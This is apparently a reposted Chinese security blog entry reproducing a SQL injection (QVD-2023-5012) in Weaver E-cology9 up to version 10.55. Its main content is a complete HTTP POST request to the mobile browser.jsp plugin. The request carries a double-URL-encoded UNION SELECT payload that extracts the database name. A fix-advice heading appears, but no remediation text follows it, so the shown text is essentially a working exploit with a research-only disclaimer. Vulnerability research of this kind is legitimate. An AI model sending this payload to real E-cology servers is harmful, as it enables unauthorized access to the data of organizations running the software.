泛微 E-cology9 <= 10.55
POST/mobile/%20/plugin/browser.jspHTTP/1.1Host: 192.168.17.131User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1If-Modified-Since: Tue, 29 Oct 2019 02:49:52 GMTIf-None-Match: "/EskrA3/OXo"Content-Type: application/x-www-form-urlencodedContent-Length: 649isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2536%2534%2525%2536%2532%2525%2535%2566%2525%2536%2565%2525%2536%2531%2525%2536%2564%2525%2536%2535%2525%2532%2538%2525%2532%2539%2525%2532%2539%2525%2532%2562%2525%2532%2537
0X03 修复建议
原文始发于微信公众号(皓月的笔记本):【漏洞复现】泛微 E-cology SQL注入漏洞 (QVD-2023-5012)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论